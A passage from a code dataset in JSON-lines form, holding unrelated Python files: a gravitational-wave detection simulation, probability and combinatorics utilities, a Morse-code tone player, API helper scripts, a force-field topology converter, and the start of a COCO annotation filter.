RHO_PLUS_LOUIS, RHO_CROSS_LOUIS, RHO_PLUS_WASH, RHO_CROSS_WASH, RHO_PLUS_VIRGO, RHO_CROSS_VIRGO = [], [], [], [], [], []\n a_AP_LOUIS, a_AP_WASH, a_AP_VIRGO, b_AP_LOUIS, b_AP_WASH, b_AP_VIRGO = [], [], [], [], [], []\n h_LOUIS, h_WASH, h_VIRGO, reach = [], [], [], []\n phi, theta, distance, rotationpercent, rotationangle, thetaobs, psi = [], [], [], [], [], [], []\n GRBTESTnum_off, GRBTESTnum_struc_best, GRBTESTnum_struc_sim = 0, 0, 0\n GWTESTnum = 0\n\n #Phi and Theta uniformly distributed \n for z in range(0,trials): # binary neutron star merger creation\n distance.append(random.uniform(minDistance,maxDistance))\n h_LOUIS.append(((((Dv_LOUIS * 12)** 2)))/(((distance[z]) ** 2))) #*2.25 to account for average over polarization\n h_WASH.append(((((Dv_WASH * 12)** 2)))/(((distance[z]) ** 2)))\n h_VIRGO.append((((((Dv_VIRGO * 12) ** 2)))/((distance[z]) ** 2)))\n \n psi.append(random.uniform(0,2 * math.pi))\n phi.append(random.uniform(0, 2 * math.pi))\n theta.append(random.uniform(0, math.pi))\n\n\n thetaobs.append(random.uniform(0,math.pi/2)) #GRB Observation angle and inclination angle\n '''------CREATE POINTS-------'''\n '''------GW DETECTORS------''' #chi is orientation from East in degrees\n #input different detector locations and orientations, beta and lambda are lattitude and longitude\n eta_AP = math.pi/2\n \n #Livingston Louisiana LIGO\n beta_LOUIS = math.radians(DMS_TO_DEGREES(30,33,46.4))\n lambd_LOUIS = math.radians(DMS_TO_DEGREES(90,46,27.3))\n chi_LOUIS = COMPASS_TO_ANGLE(math.radians(208))\n \n #Hanford Washington LIGO\n beta_WASH = math.radians(DMS_TO_DEGREES(46,27,18.5))\n lambd_WASH = math.radians(DMS_TO_DEGREES(119,24,27.6))\n chi_WASH = COMPASS_TO_ANGLE(math.radians(279))\n \n #VIRGO\n beta_VIRGO = math.radians(DMS_TO_DEGREES(43,37,53))\n lambd_VIRGO = math.radians(DMS_TO_DEGREES(10,30,16))\n chi_VIRGO = COMPASS_TO_ANGLE(math.radians(333.5))\n '''------GW DETECTORS------''' \n '''------ANTENNA PATTERNS-------'''\n for d in range(0,trials):\n a_AP_LOUIS.append(afunction(chi_LOUIS, beta_LOUIS, theta[d], phi[d], lambd_LOUIS))\n a_AP_WASH.append(afunction(chi_WASH, beta_WASH, theta[d], phi[d], lambd_WASH))\n a_AP_VIRGO.append(afunction(chi_VIRGO, beta_VIRGO, theta[d], phi[d], lambd_VIRGO))\n \n b_AP_LOUIS.append(bfunction(chi_LOUIS, beta_LOUIS, theta[d], phi[d], lambd_LOUIS))\n b_AP_WASH.append(bfunction(chi_WASH, beta_WASH, theta[d], phi[d], lambd_WASH))\n b_AP_VIRGO.append(bfunction(chi_VIRGO, beta_VIRGO, theta[d], phi[d], lambd_VIRGO))\n \n RHO_PLUS_LOUIS.append(AP_PLUS(eta_AP, a_AP_LOUIS[d], b_AP_LOUIS[d], psi[d]))\n RHO_PLUS_WASH.append(AP_PLUS(eta_AP, a_AP_WASH[d], b_AP_WASH[d], psi[d]))\n RHO_PLUS_VIRGO.append(AP_PLUS(eta_AP, a_AP_VIRGO[d], b_AP_VIRGO[d], psi[d]))\n \n RHO_CROSS_LOUIS.append(AP_CROSS(eta_AP, a_AP_LOUIS[d], b_AP_LOUIS[d], psi[d]))\n RHO_CROSS_WASH.append(AP_CROSS(eta_AP, a_AP_WASH[d], b_AP_WASH[d], psi[d]))\n RHO_CROSS_VIRGO.append(AP_CROSS(eta_AP, a_AP_VIRGO[d], b_AP_VIRGO[d], psi[d]))\n\n antennaPowerPatternSingle.append(AntennaPowerSingle(theta[d], phi[d]))\n '''------ANTENNA PATTERNS------'''\n '''------SNR CALCULATOR/CHECKER------'''\n SNRcalculatedLOUISsig, SNRcalculatedWASHsig, SNRcalculatedVIRGOsig, SNRcalculated, GWTEST = [], [], [], [], []\n SNRnum = 0\n for f in range(0, trials):\n inclinationMultiplier.append((1/8) * (1 + (6 * (math.cos(thetaobs[f]) ** 2)) + (math.cos(thetaobs[f]) ** 4))) #Schutz eq 26\n antennaPowerPatternLouis.append(AntennaPowerSingle(theta[f], phi[f]))#((RHO_PLUS_LOUIS[f]**2) + (RHO_CROSS_LOUIS[f] ** 2)))\n 
#SNRcalculatedLOUISsig.append(math.sqrt(inclinationMultiplier[f] * antennaPowerPatternLouis[f]))\n SNRcalculatedLOUISsig.append(math.sqrt(inclinationMultiplier[f] * ((RHO_PLUS_LOUIS[f]**2) + (RHO_CROSS_LOUIS[f] ** 2)) * h_LOUIS[f]))\n SNRcalculatedWASHsig.append(math.sqrt(inclinationMultiplier[f] * ((RHO_PLUS_WASH[f] ** 2) + (RHO_CROSS_WASH[f] ** 2)) * h_WASH[f]))\n SNRcalculatedVIRGOsig.append(math.sqrt(inclinationMultiplier[f] * ((RHO_PLUS_VIRGO[f] ** 2) + (RHO_CROSS_VIRGO[f] ** 2)) * h_VIRGO[f]))\n\n\n SNRcalculated.append(math.sqrt((SNRcalculatedLOUISsig[f] ** 2)))#+ (SNRcalculatedWASHsig[f] ** 2# + (SNRcalculatedVIRGOsig[f]**2)))\n #SNRcalculated.append(math.sqrt(antennaPowerPatternLouis[f] * h_LOUIS[f]))\n \n if SNRcalculated[f] >= 12: #network sensitivity in a network of 3 detectors is 12 SNR\n GWTEST.append(True)\n GWTESTnum += 1 \n else:\n GWTEST.append(False)\n '''------MEAN AND SD AND GRAPH------'''\n GWFINALnum = GWFINALnum + GWTESTnum\n GWPERCENTMEAN.append(GWTESTnum/trials)\n \nGWPERCENT = GWFINALnum / (iterations * trials)\nGWSD = standarddev(GWPERCENTMEAN, GWPERCENT, iterations)\n\n'''------MEAN AND SD AND GRAPH------'''\n'''------SNR CALCULATOR/CHECKER------'''\n'''------DATA DISPLAY------'''\n#print(antennaPowerPatternLouis)\nprint('GW PERCENT ' + str(GWPERCENT))\nprint(' ')\nprint('GW ' + str(GWFINALnum))\nprint(' ')\nprint('GW Volume '+ VolumeGpc(minDistance, maxDistance, GWPERCENT) + ' +/- ' + str((((maxDistance**3) * math.pi * (4/3) * GWSD)/(1000**3))))\n# print(VolumeShell(minDistance, maxDistance))\nprint(max(RHO_CROSS_VIRGO))\nprint(max(RHO_PLUS_VIRGO))\nprint(max(antennaPowerPatternSingle))\nprint(sum(antennaPowerPatternLouis)/len(antennaPowerPatternLouis))\nprint(max(antennaPowerPatternLouis))\nprint(sum(inclinationMultiplier)/len(inclinationMultiplier))\nprint(max(inclinationMultiplier))\n# print(max(SNRcalculatedLOUISsig))\n# print(max(SNRcalculatedWASHsig))\n# print(max(SNRcalculatedVIRGOsig))\n# print(max(SNRcalculated))\n'''------DATA DISPLAY------'''\n","sub_path":"Python stuff/GW only/GW only.py","file_name":"GW only.py","file_ext":"py","file_size_in_byte":8647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"260159985","text":"def avglongwinstreak(n, pwin, abserr=0):\n avg = 0\n for k in range(1, n + 1):\n p = fastpwinstreak(n, pwin, k)\n avg += p\n if (n - k) * p < abserr:\n break\n return avg\n\n\ndef pwinstreak(n, pwin, k):\n memo = [0] * (n + 1)\n for m in range(k, n + 1):\n memo[m] = pwin**k + sum(pwin**j * (1 - pwin) * memo[m - (j + 1)]\n for j in range(k))\n return memo[n]\n\n\ndef fastpwinstreak(n, pwin, k):\n pwink = pwin**k\n memo = [0] * (n + 1)\n windowsum = 0\n for m in range(k, n + 1):\n memo[m] = pwink + windowsum\n windowsum = pwin * windowsum + (1 - pwin) * (memo[m] - pwink *\n memo[m - k])\n return memo[n]\n\n\nprint(avglongwinstreak(3000, 0.4, 0))\nprint(avglongwinstreak(3000, 0.4, 1e-6))\n","sub_path":"2017-02-09/fastalws.py","file_name":"fastalws.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"608480207","text":"def fibo_gen(x):\n result = 1\n for el in list(range(1, x + 1)):\n result *= el\n yield result\n\n\nvar = int(input(\"Enter a number \"))\n\ni = 1\n\nfor el in fibo_gen(var):\n if i > 15:\n break\n print(el)\n i += 1\n","sub_path":"les4/ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"505268677","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport atexit\nimport pygame\nimport time\nimport sys, os\nimport gpiozero as gpio\nimport _thread as thread\nfrom array import array\nfrom pygame.locals import *\nfrom morse_lookup import *\nfrom ToneSound import *\n#from twitter_news import *\nfrom rgbmatrix import RGBMatrix#, RGBMatrixOptions\n\n################################################################\nMINKEYLENGTH = .1# .07 # Minimum dit\nKEYLENGTH = .18 #dit-doh boundary\nWORDLENGTH = .90 # Word boundary\nDOT = \".\"\nDASH = \"-\"\n################################################################\n\nimport pygame\nfrom pygame.locals import *\n\n# Play Sound\nclass ToneSound(pygame.mixer.Sound):\n def __init__(self, frequency, volume):\n self.frequency = frequency\n pygame.mixer.Sound.__init__(self, self.build_samples())\n self.set_volume(volume)\n\n def build_samples(self):\n period = int(round(pygame.mixer.get_init()[0] / self.frequency))\n samples = array(\"h\", [0] * period)\n amplitude = 2 ** (abs(pygame.mixer.get_init()[1]) - 1) - 1\n for time in range(period):\n if time < period / 2:\n samples[time] = amplitude\n else:\n samples[time] = -amplitude\n return samples\n\n def play(self, input):\n if isinstance(input,str):\n self.wordToAudio(input)\n else:\n super(ToneSound, self).play(input)\n\n def wordToAudio(self, word):\n ditlength = (MINKEYLENGTH + KEYLENGTH ) / 2\n for char in word:\n # Print\n print(char)\n\n # Fullstop at space\n if char is \" \":\n time.sleep( WORDLENGTH )\n continue\n\n # Revert char to code\n try:\n morse = list(morse_code_lookup.keys())\\\n [list(morse_code_lookup.values()).index(char.upper())]\n except:\n continue\n\n # Play in audio\n for ditdoh in morse:\n print (ditdoh, end=\"\")\n self.play(-1)\n time.sleep( ditlength if ditdoh is DOT \\\n else ditlength * 3 )\n self.stop()\n time.sleep( ditlength )\n time.sleep( WORDLENGTH )\n print()\n","sub_path":"lib/ToneSound.py","file_name":"ToneSound.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"220900494","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\nfrom api import apiUser\nfrom api import apiConsts\n\n\ndef post(url, params=None):\n for x in range(3):\n res = requests.post(url, data=params)\n print('post %s - %s: [%s]%s - %s' % (res.url, params, res.status_code, res.reason, res.json()))\n if res.status_code == 200:\n break\n\n if res.status_code != 200:\n raise RuntimeError('Request failed repeatedly; check the network or the API!')\n return res.json()\n\n\ndef postFunc(func):\n if apiConsts.ACCESS_TOKEN is None: # not logged in\n apiUser.login()\n for x in range(3):\n json = func()\n if json['code'] == '10001': # not logged in\n apiUser.login()\n json = func()\n if json['code'] == '0': # request succeeded\n break\n return json\n\n\nif __name__ == '__main__':\n post('http://www.cxdri.com/interface/weSchoolAction!stuLogin.htm')\n","sub_path":"python-http-requests/src/api/apiBase.py","file_name":"apiBase.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"617233675","text":"from linkedin import linkedin # pip install python-linkedin\n\n# Define CONSUMER_KEY, CONSUMER_SECRET, \n# USER_TOKEN, and USER_SECRET from the credentials \n# provided 
in your LinkedIn application\n\nCONSUMER_KEY = ''\nCONSUMER_SECRET = ''\nUSER_TOKEN = ''\nUSER_SECRET = ''\n\nRETURN_URL = 'http://localhost:8000' # Not required for developer authentication\n\n# Instantiate the developer authentication class\n\nauth = linkedin.LinkedInDeveloperAuthentication(CONSUMER_KEY, CONSUMER_SECRET, \n USER_TOKEN, USER_SECRET, \n RETURN_URL, \n permissions=linkedin.PERMISSIONS.enums.values())\n\n# Pass it in to the app...\n\napp = linkedin.LinkedInApplication(auth)\n\nimport json\n\nconnections = app.get_connections()\n\nconnections_data = 'linkedin_connections.json'\n\nf = open(connections_data, 'w')\nf.write(json.dumps(connections, indent=1))\nf.close()\n\nDATA_FILENAME = 'position_info.json'\n\nfeeds = []\nwith open(DATA_FILENAME, mode='w') as feedsjson:\n for i in range(len(connections['values'])):\n if connections['values'][i]['id'] != 'private':\n connections['values'][i]['id']\n connection_positions = app.get_profile(member_id=connections['values'][i]['id'], \n selectors=['positions','id'])\n feeds.append(connection_positions)\n json.dump(feeds, feedsjson)","sub_path":"data/linkedin_api_getdata.py","file_name":"linkedin_api_getdata.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"437179104","text":"\"\"\"\nFile: openforcefield2gromos\nWarnings: this class is WIP!\nTODO:REWORK\nDescription:\n This is a super class to convert from a openforcfield topology to a gromos topology\nAuthor: Marc Lehner\n\"\"\"\n\n#imports\nimport importlib\nfrom pygromos.files.topology.top import Top\nfrom pygromos.files.gromos_system.ff.forcefield_system import forcefield_system\n\n\nif(importlib.util.find_spec(\"openff\") == None):\n raise ImportError(\"openforcefield2gromos is not enabled without openFF toolkit package! 
Please install openFF toolkit.\")\nelse:\n from openff.toolkit.topology import Molecule, Topology\n #from openforcefield.typing.engines import smirnoff\n #from openforcefield.typing.engines.smirnoff import forcefield\n\nfrom pygromos.data import topology_templates\nimport os\nimport collections\nfrom simtk import unit as u\n\nclass openforcefield2gromos():\n def __init__(self, openFFmolecule:Molecule, gromosTop:Top=None, forcefield:forcefield_system=None):\n self.atomic_number_dict = collections.defaultdict(str)\n # get openmm atom type code / periodic table\n self.atomic_number_dict[1] = \"H\"\n self.atomic_number_dict[2] = \"He\"\n self.atomic_number_dict[3] = \"Li\"\n self.atomic_number_dict[4] = \"Be\"\n self.atomic_number_dict[5] = \"B\"\n self.atomic_number_dict[6] = \"C\"\n self.atomic_number_dict[7] = \"N\"\n self.atomic_number_dict[8] = \"O\"\n self.atomic_number_dict[9] = \"F\"\n self.atomic_number_dict[10] = \"Ne\"\n self.atomic_number_dict[11] = \"Na\"\n self.atomic_number_dict[12] = \"Mg\"\n self.atomic_number_dict[13] = \"Al\"\n self.atomic_number_dict[14] = \"Si\"\n self.atomic_number_dict[15] = \"P\"\n self.atomic_number_dict[16] = \"S\"\n self.atomic_number_dict[17] = \"Cl\"\n self.atomic_number_dict[18] = \"Ar\"\n self.atomic_number_dict[19] = \"K\"\n self.atomic_number_dict[20] = \"Ca\"\n self.atomic_number_dict[35] = \"Br\"\n self.atomic_number_dict[53] = \"I\"\n\n\n if gromosTop != None:\n self.gromosTop=gromosTop\n else:\n self.gromosTop = Top(in_value=topology_templates.blank_topo_template)\n self.gromosTop._orig_file_path = os.getcwd()\n \n self.openFFmolecule = openFFmolecule\n self.openFFTop = Topology.from_molecules(openFFmolecule)\n\n #import the openforcfield forcefield-file\n if forcefield != None:\n self.forcefield = forcefield\n else:\n self.forcefield = forcefield_system(name=\"off\")\n self.off = self.forcefield.off\n\n #create list of all forces\n self.molecule_force_list = []\n self.molecule_force_list = self.off.label_molecules(self.openFFTop)\n\n # 1-3 / 1-4 exclusion lists\n self.exclusionList13 = dict()\n self.exclusionList14 = dict()\n\n def convertResname(self):\n if len(self.openFFmolecule.name) >= 1:\n self.gromosTop.add_new_resname(self.openFFmolecule.name)\n else:\n self.gromosTop.add_new_resname(self.openFFmolecule.hill_formula)\n \n def convertBonds(self):\n for molecule in self.molecule_force_list:\n for key in molecule[\"Bonds\"]:\n force = molecule[\"Bonds\"][key]\n #hQ = topology.atom(force[0]).atomic_number == 1 or topology.atom(force[1]).atomic_number == 1\n hQ = not all([self.openFFTop.atom(x).atomic_number != 1 for x in key])\n atomI = key[0]+1\n atomJ = key[1]+1\n k = force.k.value_in_unit(u.kilojoule / (u.mole * u.nanometer ** 2))\n b0 = force.length.value_in_unit(u.nanometer)\n self.gromosTop.add_new_bond(k=k, b0=b0, atomI=atomI, atomJ=atomJ, includesH=False) #hQ\n if not hasattr(self.gromosTop, \"BONDSTRETCHTYPE\"):\n self.gromosTop.add_block(blocktitle=\"BONDSTRETCHTYPE\", content=[])\n if not hasattr(self.gromosTop, \"BONDH\"):\n self.gromosTop.add_block(blocktitle=\"BONDH\", content=[])\n if not hasattr(self.gromosTop, \"BOND\"):\n self.gromosTop.add_block(blocktitle=\"BOND\", content=[])\n\n def convertAngles(self):\n for molecule in self.molecule_force_list:\n for key in molecule[\"Angles\"]:\n force = molecule[\"Angles\"][key]\n hQ = not all([self.openFFTop.atom(x).atomic_number != 1 for x in key])\n atomI=key[0]+1\n atomJ=key[1]+1\n atomK=key[2]+1\n k = force.k.value_in_unit(u.kilojoule / (u.mole * u.radian ** 2))\n kh = 
force.k.value_in_unit(u.kilojoule / (u.mole * u.degree ** 2))\n b0 = force.angle.value_in_unit(u.degree)\n self.gromosTop.add_new_angle(k=k, kh=kh, b0=b0, atomI=atomI, atomJ=atomJ, atomK=atomK, includesH=False) #hQ\n if not hasattr(self.gromosTop, \"BONDANGLEBENDTYPE\"):\n self.gromosTop.add_block(blocktitle=\"BONDANGLEBENDTYPE\", content=[])\n if not hasattr(self.gromosTop, \"BONDANGLEH\"):\n self.gromosTop.add_block(blocktitle=\"BONDANGLEH\", content=[])\n if not hasattr(self.gromosTop, \"BONDANGLE\"):\n self.gromosTop.add_block(blocktitle=\"BONDANGLE\", content=[])\n\n def convertTosions(self):\n for molecule in self.molecule_force_list:\n for key in molecule[\"ProperTorsions\"]:\n force = molecule[\"ProperTorsions\"][key]\n hQ = not all([self.openFFTop.atom(x).atomic_number != 1 for x in key])\n atomI=key[0]+1\n atomJ=key[1]+1\n atomK=key[2]+1\n atomL=key[3]+1\n k_list = force.k\n phase_list = force.phase\n per_list = force.periodicity\n for t in range(len(k_list)):\n CP=k_list[t].value_in_unit(u.kilojoule/u.mole)\n PD=phase_list[t].value_in_unit(u.degree)\n NP=per_list[t]\n # convert negativ CP by phase shifting\n if CP < 0:\n CP = abs(CP)\n PD += 180\n self.gromosTop.add_new_torsiondihedral(CP=CP, PD=PD, NP=NP, atomI=atomI, atomJ=atomJ, atomK=atomK, atomL=atomL, includesH=False)#hQ\n if not hasattr(self.gromosTop, \"TORSDIHEDRALTYPE\"):\n self.gromosTop.add_block(blocktitle=\"TORSDIHEDRALTYPE\", content=[])\n if not hasattr(self.gromosTop, \"DIHEDRALH\"):\n self.gromosTop.add_block(blocktitle=\"DIHEDRALH\", content=[])\n if not hasattr(self.gromosTop, \"DIHEDRAL\"):\n self.gromosTop.add_block(blocktitle=\"DIHEDRAL\", content=[])\n\n def convertImproper(self):\n for molecule in self.molecule_force_list:\n for key in molecule[\"ImproperTorsions\"]:\n force = molecule[\"ImproperTorsions\"][key]\n hQ = not all([self.openFFTop.atom(x).atomic_number != 1 for x in key])\n atomI=key[0]+1\n atomJ=key[1]+1\n atomK=key[2]+1\n atomL=key[3]+1\n k_list = force.k\n phase_list = force.phase\n per_list = force.periodicity\n for t in range(len(k_list)):\n CP=k_list[t].value_in_unit(u.kilojoule/u.mole)\n PD=phase_list[t].value_in_unit(u.degree)\n NP=per_list[t]\n self.gromosTop.add_new_torsiondihedral(CP=CP, PD=PD, NP=NP, atomI=atomI, atomJ=atomJ, atomK=atomK, atomL=atomL, includesH=False) #hQ\n if not hasattr(self.gromosTop, \"IMPDIHEDRALTYPE\"):\n self.gromosTop.add_block(blocktitle=\"IMPDIHEDRALTYPE\", content=[])\n if not hasattr(self.gromosTop, \"IMPDIHEDRALH\"):\n self.gromosTop.add_block(blocktitle=\"IMPDIHEDRALH\", content=[])\n if not hasattr(self.gromosTop, \"IMPDIHEDRAL\"):\n self.gromosTop.add_block(blocktitle=\"IMPDIHEDRAL\", content=[])\n\n def createVdWexclusionList_backup(self) -> dict:\n exclusionlist=dict()\n for molecule in self.molecule_force_list:\n for key in molecule[\"Bonds\"]:\n if not str(key[0]) in exclusionlist.keys():\n exclusionlist[str(key[0])] = {key[1]}\n exclusionlist[str(key[0])].add(key[1])\n if not str(key[1]) in exclusionlist.keys():\n exclusionlist[str(key[1])] = {key[0]}\n exclusionlist[str(key[1])].add(key[0])\n for key in molecule[\"Angles\"]:\n if not str(key[0]) in exclusionlist.keys():\n exclusionlist[str(key[0])] = {key[1]}\n exclusionlist[str(key[0])].add(key[1])\n exclusionlist[str(key[0])].add(key[2])\n if not str(key[1]) in exclusionlist.keys():\n exclusionlist[str(key[1])] = {key[0]}\n exclusionlist[str(key[1])].add(key[0])\n exclusionlist[str(key[1])].add(key[2])\n if not str(key[2]) in exclusionlist.keys():\n exclusionlist[str(key[2])] = {key[0]}\n 
exclusionlist[str(key[2])].add(key[0])\n exclusionlist[str(key[2])].add(key[1])\n for key in molecule[\"ProperTorsions\"]:\n if not str(key[0]) in exclusionlist.keys():\n exclusionlist[str(key[0])] = {key[1]}\n exclusionlist[str(key[0])].add(key[1])\n exclusionlist[str(key[0])].add(key[2])\n exclusionlist[str(key[0])].add(key[3])\n if not str(key[1]) in exclusionlist.keys():\n exclusionlist[str(key[1])] = {key[0]}\n exclusionlist[str(key[1])].add(key[0])\n exclusionlist[str(key[1])].add(key[2])\n exclusionlist[str(key[1])].add(key[3])\n if not str(key[2]) in exclusionlist.keys():\n exclusionlist[str(key[2])] = {key[0]}\n exclusionlist[str(key[2])].add(key[0])\n exclusionlist[str(key[2])].add(key[1])\n exclusionlist[str(key[2])].add(key[3])\n if not str(key[3]) in exclusionlist.keys():\n exclusionlist[str(key[3])] = {key[0]}\n exclusionlist[str(key[3])].add(key[0])\n exclusionlist[str(key[3])].add(key[1])\n exclusionlist[str(key[3])].add(key[2])\n for key in molecule[\"ImproperTorsions\"]:\n if not str(key[0]) in exclusionlist.keys():\n exclusionlist[str(key[0])] = {key[1]}\n exclusionlist[str(key[0])].add(key[1])\n exclusionlist[str(key[0])].add(key[2])\n exclusionlist[str(key[0])].add(key[3])\n if not str(key[1]) in exclusionlist.keys():\n exclusionlist[str(key[1])] = {key[0]}\n exclusionlist[str(key[1])].add(key[0])\n exclusionlist[str(key[1])].add(key[2])\n exclusionlist[str(key[1])].add(key[3])\n if not str(key[2]) in exclusionlist.keys():\n exclusionlist[str(key[2])] = {key[0]}\n exclusionlist[str(key[2])].add(key[0])\n exclusionlist[str(key[2])].add(key[1])\n exclusionlist[str(key[2])].add(key[3])\n if not str(key[3]) in exclusionlist.keys():\n exclusionlist[str(key[3])] = {key[0]}\n exclusionlist[str(key[3])].add(key[0])\n exclusionlist[str(key[3])].add(key[1])\n exclusionlist[str(key[3])].add(key[2])\n #now we should have added everything and we can start to delete\n for key in exclusionlist:\n for i in range(0, int(key) + 1):\n exclusionlist[key].discard(i)\n return exclusionlist\n\n def createVdWexclusionList(self):\n bondDict=dict()\n ex13 = dict()\n ex14 = dict()\n # create a list of all bonds\n for molecule in self.molecule_force_list:\n for key in molecule[\"Bonds\"]:\n if not str(key[0]) in bondDict.keys():\n bondDict[str(key[0])] = {key[1]}\n bondDict[str(key[0])].add(key[1])\n if not str(key[1]) in bondDict.keys():\n bondDict[str(key[1])] = {key[0]}\n bondDict[str(key[1])].add(key[0])\n #use bond dict to createexclusion lists\n for lvl1 in bondDict:\n ex13[lvl1] = bondDict[lvl1].copy()\n ex14[lvl1] = bondDict[lvl1].copy() #just init 1-3 values will be removed later\n for lvl2 in bondDict[lvl1]:\n ex13[lvl1].add(lvl2)\n for lvl3 in bondDict[str(lvl2)]:\n ex13[lvl1].add(lvl3)\n for lvl4 in bondDict[str(lvl3)]:\n ex14[lvl1].add(lvl4)\n # remove 1-3 from 1-4\n for key in ex14:\n for i in ex13[key]:\n ex14[key].discard(i)\n # remove all smaller entries\n for key in ex13:\n for i in range(0, int(key) + 1):\n ex13[key].discard(i)\n for key in ex14:\n for i in range(0, int(key) + 1):\n ex14[key].discard(i)\n \n # return\n self.exclusionList13 = ex13\n self.exclusionList14 = ex14\n\n\n\n def convertVdW(self):\n self.createVdWexclusionList()\n moleculeItr = 1\n for molecule in self.molecule_force_list:\n panm_dict = collections.defaultdict(int)\n for key in molecule[\"vdW\"]:\n force = molecule[\"vdW\"][key]\n ATNM = int(key[0]) + 1\n MRES = moleculeItr\n # get element sympol: \n atomic_number = self.openFFmolecule.atoms[int(key[0])].atomic_number\n element_symbol = 
self.atomic_number_dict[atomic_number]\n panm_dict[element_symbol] += 1\n PANM = element_symbol + str(panm_dict[element_symbol])\n IAC = 0\n MASS = self.openFFmolecule.atoms[int(key[0])].mass.value_in_unit(u.dalton)\n CG = 0\n CGC = 1 \n if str(key[0]) in self.exclusionList13:\n openFFexList13 = list(self.exclusionList13[str(key[0])])\n INE = [int(x)+1 for x in openFFexList13]\n else:\n INE = list()\n if str(key[0]) in self.exclusionList14:\n openFFexList14 = list(self.exclusionList14[str(key[0])])\n INE14 = [int(x)+1 for x in openFFexList14]\n else:\n INE14 = list()\n epsilon = float(force.epsilon.value_in_unit(u.kilojoule_per_mole))\n rmin = 2 * force.rmin_half.value_in_unit(u.nanometer)\n C6 = 2 * epsilon * (rmin**6)\n C12 = epsilon * (rmin**12)\n IACname = force.id\n self.gromosTop.add_new_atom(ATNM=ATNM, MRES=MRES, PANM=PANM, IAC=IAC, MASS=MASS, CG=CG, CGC=CGC, INE=INE, INE14=INE14, C6=C6, C12=C12, IACname=IACname)\n moleculeItr += 1\n\n def convert_other_stuff(self):\n if not hasattr(self.gromosTop, \"SOLUTEMOLECULES\"):\n self.gromosTop.add_block(blocktitle=\"SOLUTEMOLECULES\", content=['1', str(self.openFFmolecule.n_atoms)])\n else:\n self.gromosTop.SOLUTEMOLECULES.content = [['1'], [str(self.openFFmolecule.n_atoms)]]\n if not hasattr(self.gromosTop, \"TEMPERATUREGROUPS\"):\n self.gromosTop.add_block(blocktitle=\"TEMPERATUREGROUPS\", content=['1', str(self.openFFmolecule.n_atoms)])\n else:\n self.gromosTop.TEMPERATUREGROUPS.content = [['1'], [str(self.openFFmolecule.n_atoms)]]\n if not hasattr(self.gromosTop, \"PRESSUREGROUPS\"):\n self.gromosTop.add_block(blocktitle=\"PRESSUREGROUPS\", content=['1', str(self.openFFmolecule.n_atoms)])\n else:\n self.gromosTop.PRESSUREGROUPS.content = [['1'], [str(self.openFFmolecule.n_atoms)]]\n if not hasattr(self.gromosTop, \"LJEXCEPTIONS\"):\n self.gromosTop.add_block(blocktitle=\"LJEXCEPTIONS\", content=['0',''])\n if not hasattr(self.gromosTop, \"SOLVENTATOM\"):\n self.gromosTop.add_block(blocktitle=\"SOLVENTATOM\", content=['0',''])\n if not hasattr(self.gromosTop, \"SOLVENTCONSTR\"):\n self.gromosTop.add_block(blocktitle=\"SOLVENTCONSTR\", content=['0',''])\n if not hasattr(self.gromosTop, \"TOPVERSION\"):\n self.gromosTop.add_block(blocktitle=\"TOPVERSION\", content=['2.0'])\n if not hasattr(self.gromosTop, \"PHYSICALCONSTANTS\"):\n self.gromosTop.add_block(blocktitle=\"PHYSICALCONSTANTS\", content=[\"\"])\n\n def convert(self):\n #print OpenFF warning in Title\n titleString = \"\"\n titleString += \"\\n\\tname: \" + self.openFFmolecule.name + \"\\t hill_formula: \" + self.openFFmolecule.hill_formula\n titleString += \"\\n\\t\" + 40*\"-\" + \"\\n\\t| created from OpenForceField topology |\\n\\t| use Amber Block for OpenFF topology! 
|\\n\\t\" + 40*\"-\"+\"\\n\"\n if hasattr(self.gromosTop, \"TITLE\"):\n self.gromosTop.TITLE.content += [titleString]\n else:\n self.gromosTop.add_block(blocktitle=\"TITLE\", content=[titleString])\n #Do all the conversions\n self.convertResname()\n self.convertBonds()\n self.convertAngles()\n self.convertTosions()\n self.convertImproper()\n self.convertVdW()\n self.convert_other_stuff()\n\n def convert_return(self) -> Top:\n self.convert()\n return self.gromosTop\n","sub_path":"pygromos/files/gromos_system/ff/openforcefield2gromos.py","file_name":"openforcefield2gromos.py","file_ext":"py","file_size_in_byte":17598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"313116945","text":"class Solution:\n def helper(self, candidates, k):\n if k == 0:\n return []\n if k == 1:\n return [[c] for c in candidates]\n res = []\n for i in range(len(candidates)):\n next_combinations = self.helper(candidates[i + 1:], k - 1)\n for c in next_combinations:\n res.append([candidates[i]] + c)\n return res\n\n def combine(self, n, k):\n candidates = list(range(1, n + 1))\n res = self.helper(candidates, k)\n return res","sub_path":"combinations/combinations.py","file_name":"combinations.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"445327839","text":"import coco\nfrom coco import Image, ImageId, AnnotationId\nimport argparse\nimport time\nimport numpy as np\n\n\ndef getargs():\n parser = argparse.ArgumentParser(description='Process some integers.')\n # http://ja.pymotw.com/2/argparse/\n parser.add_argument(\"inputfiles\", nargs=2)\n parser.add_argument('--image', action='store_true', default=False)\n parser.add_argument('--annotation', action='store_true', default=False)\n parser.add_argument('-o', dest='outputfile',\n type=str, default='intersection.json')\n\n return parser.parse_args()\n\n\ndef main():\n args = getargs()\n\n if not (args.image or args.annotation):\n args.image = True\n id_txt = args.inputfiles[1]\n ids = np.loadtxt(fname=id_txt, dtype=\"int\")\n begin_time = int(round(time.time() * 1000))\n with coco.coco(args.inputfiles[0]) as data:\n end_time = int(round(time.time() * 1000))\n print(f'finish load {end_time-begin_time} ms', flush=True)\n filtered_ids = ids\n print('begin filter')\n begin_time = 